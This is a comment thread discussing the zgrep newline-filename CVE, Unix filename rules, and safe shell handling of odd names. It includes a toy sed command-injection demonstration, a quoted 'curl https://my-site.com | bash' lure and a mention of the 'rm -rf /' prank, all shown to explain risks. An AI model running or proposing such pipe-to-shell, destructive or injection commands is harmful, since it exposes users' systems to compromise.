While grep is written in C, zgrep is written in POSIX sh; the bug came from using sed to escape arguments, and sed, being a line-oriented utility, is a poor fit for operating on strings that can contain newlines (such as Linux filenames).
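This isn't zgrep's actual code, just a toy sketch of that failure mode: splice a filename into a sed script (say, to prefix output lines with the name) and a name containing a newline turns its second line into a sed command of its own.

    # Hypothetical illustration, not zgrep's real escaping logic.
    # A "filename" whose second line is itself a valid sed command:
    name=$(printf 'log|\ns|match|INJECTED')

    # Intended: prefix each output line with "$name:".
    printf 'match here\n' | sed "s|^|$name:|"
    # Prints "logINJECTED: here": the newline split the sed script, and the
    # name's second line ran as its own command (a harmless s/// here, but
    # GNU sed's w and e commands can write files or run programs).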
Pass is a wrapper script around git and gpg. You can get the functionality of `pass` by running git and gpg commands directly.
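For the curious, here is roughly the plumbing it wraps - a hedged sketch, assuming a key ID of YOUR_KEY_ID, the default store at ~/.password-store, and that the store is already a git repo (pass itself also handles .gpg-id files, nested folders, and so on).

    # Roughly "pass insert example.com" (illustrative, not pass's exact internals):
    mkdir -p ~/.password-store
    printf '%s\n' 'hunter2' |
      gpg --encrypt --recipient YOUR_KEY_ID --output ~/.password-store/example.com.gpg
    git -C ~/.password-store add example.com.gpg
    git -C ~/.password-store commit -m "Add example.com"

    # Roughly "pass show example.com":
    gpg --decrypt --quiet ~/.password-store/example.com.gpg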
Learning git itself is non-intuitive, but the gpg utilities take the learning curve to a whole other level. If you want to make simple use of the gpg utilities, you should plan on setting aside a few full days to learn how they work. Or just use pass, which additionally leverages git for password history.
They can contain any octet except ASCII NUL and /.
That said, pretty much every filesystem's on-disk format has an explicit length field for file names. So in theory, there's nothing stopping them from supporting completely binary filenames - it's the kernel's VFS layer that treats NUL and / as special.
Well, this seems like the sort of error we've all made when throwing together our own personal scripts, so I guess it's somewhat heartening that the serious Red Hat folks would make it too.
My epiphany was using find | xargs and realizing I need -print0 for the former and -0 for the latter to handle special characters. Then I realized all my previous bash scripts were WRONG...
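For anyone who hasn't hit this yet, the safe pattern looks something like:

    # NUL-terminate names in find and split on NUL in xargs, so filenames
    # containing newlines (or any other whitespace) survive intact:
    find . -type f -name '*.log' -print0 | xargs -0 grep -l -- 'ERROR'

    # The naive version this replaces splits names on whitespace, including newlines:
    #   find . -type f -name '*.log' | xargs grep -l 'ERROR'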
Is there any real use case for having filenames with newlines? Every time I recall that we have to design programs around that, I wonder why it's possible in the first place.
The only invalid character in a path is \0 (which would terminate the string immediately), and a particular filename cannot contain /, or be "." or "..". It doesn't even have to be Unicode. Literally any other bytes are allowed.
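Easy to see for yourself on a typical Linux filesystem (ext4 etc.), for example:

    # Create a file whose name contains a newline and a tab, then list it.
    touch "$(printf 'weird\nname\twith control chars')"
    ls -b   # GNU coreutils ls renders the control characters as backslash escapes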
EOT or ctrl-D only has significance when typed into a tty. Once it has turned into a character it is as harmless as any other byte value, it doesn't end anything by itself.
Doesn't the article show that newline isn't harmless at all?
Of course EOT doesn't end anything by itself, nor does 0x0a end a line by itself -- all that happens through code that interprets those characters in a particular way, so talking about the "danger" of a character in absence of any code that operates on it is meaningless. In the presence of code, on the other hand, "harmless" in the extreme sense means "there exists no code that will act up when presented this character", which the article shows to be wrong.
I think it is good that it is so flexible, because you never know what kind of data you may want represented on your filesystem. I would rather that there be as few restrictions as possible.
There are cases where you will encounter lots of nasty filenames, especially if you are handling user generated content, like scraping from YouTube or Instagram.
It doesn't directly help UTF-8, since all the bytes UTF-8 uses for encoding non-ASCII have the high bit set.
It might directly help with UTF-16, I'm not sure.
But the general idea of "block only a few specific characters (\0 and /) and allow all the rest" does help with UTF-8. If the designers had said something like "only ASCII letters, numbers, dashes and underscores", that would have blocked UTF-8, and we might have ended up with something like URL hostnames, where you use Punycode to encode non-ASCII into ASCII.
The point is that Unix behaviour is to treat filenames as byte strings, so no particular encoding is mandated by the kernel or by most tools. That made the transition to UTF-8 fairly painless.
Not filtering untrusted inputs, and not escaping or handling them correctly, is how you write insecure software. Guarantees about arbitrary input don't change that (unless they're very strict, in which case they're indirectly filtering inputs anyway).
Why does that make it easier to write insecure software? Which is easier: dealing with bytes, only 2 of which have special meanings (/ and \0), or dealing with a ton of different character classes, each of which you have to think about and code for? The second case is what happened with URLs, so there are all sorts of weird rules about having a ? in this section but not that section, plus percent encoding and Punycode and the like.
"This flaw occurs due to insufficient validation when processing filenames with two or more newlines where selected content and the target file names are embedded in crafted multi-line file names."
Perhaps I don't get this because I have used Windows most of my life (and DOS before that) but is it valid to have newline characters in a Unix/Linux filename?
I have been using the filename "meeting-notes:10/1 \n Unix & Windows.txt" to test various apps. It tends to expose just how brittle modern computing still is.
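The literal / in that name can't exist on a Unix filesystem (it's the path separator), but a close variant is easy to create for testing, e.g.:

    # Unix-legal variant of that test name, with the slash swapped for a dash:
    touch "$(printf 'meeting-notes:10-1 \n Unix & Windows.txt')"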
It's a bypass of a mitigation for an old trick that worked back in the day, where you could watch someone nuke themselves off of IRC by convincing them to type rm -rf /
Oh cool! I use nasty-files as a submodule with some of my tests. I can't believe how long I went without testing against the filename corner cases.
I've found so much software that doesn't properly handle nasty filenames, I think it should be tested for more.
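Even without pulling in a whole repo, a tiny homemade fixture catches a surprising amount - a rough sketch (nowhere near as thorough as nasty-files):

    #!/bin/sh
    # Populate a directory with a few corner-case names to run tools against.
    dir=nasty-test
    mkdir -p "$dir"
    touch "$dir/plain.txt"
    touch "$dir/ leading-space"
    touch "$dir/trailing-space "
    touch "$dir/-starts-with-dash"
    touch "$dir/two  spaces"
    touch "$dir/$(printf 'embedded\nnewline')"
    touch "$dir/tab$(printf '\t')here"
    touch "$dir/single'quote"
    touch "$dir/"'double"quote'
    touch "$dir/*glob*"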
There are no rules about what can be in a filename, except that in practice it can't contain \0 or /, because the kernel interprets those as the end of the string and the path-element separator, respectively.
This doesn't even seem like a legitimate security vulnerability at all, just a generic behavior bug. I'm guessing there are countless bugs like this in a common Linux userland.
I'd argue that the security vulnerability only exists in programs that pass untrusted user input to zgrep, which would be an obviously insecure thing to do.
Unless zgrep claims it's safe against untrusted user input? But that would be weird and surprising.
This year, there was a bug reported against zgrep where filenames containing two newlines caused it to behave incorrectly. It got a CVE and a front-page Hacker News post.
I give it very good odds this vulnerability has seen next to zero exploitation in the wild in either of the two cases above.
There aren't, to my knowledge, common programs or setups that would cause this to matter.
This would probably be used for social engineering at best, where the attacker convinces a victim: "hey, git clone my repo, and then run zgrep "bad string" *" for some contrived reason.
Someone who's trying to assist someone else on Discord or wherever probably won't consider running "zgrep" in an attacker-controlled directory dangerous, so they might do it, while if the attacker said "I need help, curl https://my-site.com | bash to repro", the victim would absolutely not do it.
> while if the attacker said "I need help, curl https://my-site.com | bash to repro", the victim would absolutely not do it.
You’d be surprised. I wrote a Postfix tutorial ages ago and left my real email address in the To: of an example test email. I subsequently got a lot of emails from root@s with the exact same title and body over the years. Too many people copy paste anything labeled as instruction without a second thought.
It sounds like if a web service allowed a user to upload a file with attacker-chosen filename, which it will then run zgrep on, it would be vulnerable.
That's actually the suggested installation mechanism for a lot of software. The most recent I can think of were some AWS CLI tools, as delivered by AWS. Height of irresponsibility imo.
Given infinite code, yes. I would imagine exploitability would be rare, but that it’s easier to fix the vulnerability and move on rather than care about whether or not things are affected.
zgrep does create a temporary directory to store the grep search pattern, but only if the pattern is passed via `zgrep -f`, and only if the pattern passed in is not a regular file (i.e. `zgrep -f <(echo "foo") some_file.gz` would create a temporary file with the contents "foo", not with the contents of some_file.gz, and `zgrep -f pattern_file search_file.gz` would not create any temporary file).
I'm sure there are a lot of closed-source Linux utilities that will break in the same or worse ways. The problem will just never be found there.
The issue with finding flaws in source is that it takes a massive amount of logical thought about what inputs are possible. For example, a newline is valid in a Linux file name, but I've never legitimately used one, nor do I believe I've even seen one in the last 25 years of using Linux.
> For example, a newline is valid in a Linux file name, but I've never legitimately used one, nor do I believe I've even seen one in the last 25 years of using Linux.
Likewise. I wonder if SELinux or AppArmor or the like allows setting a policy for valid filenames to create. E.g. no newlines, only valid UTF-8, only printable characters.
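I don't know of an LSM knob for that, but you can at least audit for offenders with something like:

    # Names containing a newline:
    find . -name "$(printf '*\n*')" -print
    # Names containing bytes outside printable ASCII (note: this also flags
    # perfectly legitimate non-ASCII / UTF-8 names):
    LC_ALL=C find . -name '*[! -~]*' -print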
I've seen them (specifically, filenames generated from values in a "modern" configuration language - json or yaml - that mistakenly had newlines in them). Fortunately, most of the shell tools involved used `-print0` and the related options anyway (because once you have humans involved, it's the easy way to handle ordinary spaces in names), and the things that did break were only "some low-value data processing got skipped" rather than anything harmful.